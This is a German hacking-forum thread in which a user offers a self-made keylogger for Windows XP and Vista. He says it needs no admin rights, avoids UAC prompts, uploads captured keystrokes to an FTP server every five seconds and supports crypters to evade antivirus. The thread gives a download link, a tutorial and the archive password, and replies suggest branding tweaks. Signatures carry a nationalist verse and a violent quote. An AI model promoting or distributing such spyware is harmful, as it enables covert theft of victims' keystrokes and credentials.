[SC]Keylogger

• Ich habe mich heute mal an den PC gesetzt und habe mal einen Keylogger programmiert der auf XP sowie auch Vista funktioniert. Es braucht keinerlei Rechte und auch UAC wird nicht angehen.
    Es loggt eigentlich fast alle Buchstaben und sendet Files an den FTP Server.
    Die Details werden natürlich verschüsselt gespeichert jedoch kann man per Sniffer trotzdem die FTP-Details in PlainText sniffen.
    AuÃ?erdem besitz es ein Backup-System womit die Logs alle 5 Sekunden synchronysiert werden!
    Es hat vollen Crypter-Support wobei nicht die fertige EXE sondern die stub gecryptet werden muss!
    Ich wünsch euch noch viel Spass mit dem Tool!
    Anregungen und Kritik erwünscht!

Screen:

Download mit Tutorial:
    http://uploaded.to/?id=jhhx7b

*BUGFIX*
    Ich habe an der Stub rumgespielt und habe wohl ein paar Sections zerstört... Wie es aussieht ist der Vista Loader "toleranter" als der XP Loader, wodurch die EXE nur auf Vista gefunkt hat! Nun sollte es wieder gehn ;)

Du sagst, du spürst die Ohnmacht, denn der Feind ist ach so stark
    Und er will dich niederhalten mit Geschrei durch Bein und Mark
    Mit Verboten und Zensur kann er zwar den Kampf erschweren
    Doch niemals wird ein Richterspruch den freien Geist bekehren.

Fürchte lieber Deutschlands Untergang als die Reden der Vasallen
    Derer, die der Lüge dienen, denn schon bald werden sie fallen.

Einmal editiert, zuletzt von Slayer616 ()

• Sieht gut aus aber in der Caption steht noch Form1 und du hast vergessen das PW zu posten ;)

Sie gehen auf ihren kommandierenden<br />Offizier zu, setzen ihm die Waffe an<br />den Kopf und blasen ihm das Gehirn raus.

Einmal editiert, zuletzt von Paran0id ()

• Klingt ganz nett, was mir auf anhieb auffällt ist das du Form1 stehen lassen hast.
    Solltest du vielleicht noch in [SC]Keylogger public v1.0 coded by Slayer616 oder so umbenennen.
    Edit Paran0id war schneller.

GruÃ? JohmJ.

• PW: Slayer616

Du sagst, du spürst die Ohnmacht, denn der Feind ist ach so stark
    Und er will dich niederhalten mit Geschrei durch Bein und Mark
    Mit Verboten und Zensur kann er zwar den Kampf erschweren
    Doch niemals wird ein Richterspruch den freien Geist bekehren.

Fürchte lieber Deutschlands Untergang als die Reden der Vasallen
    Derer, die der Lüge dienen, denn schon bald werden sie fallen.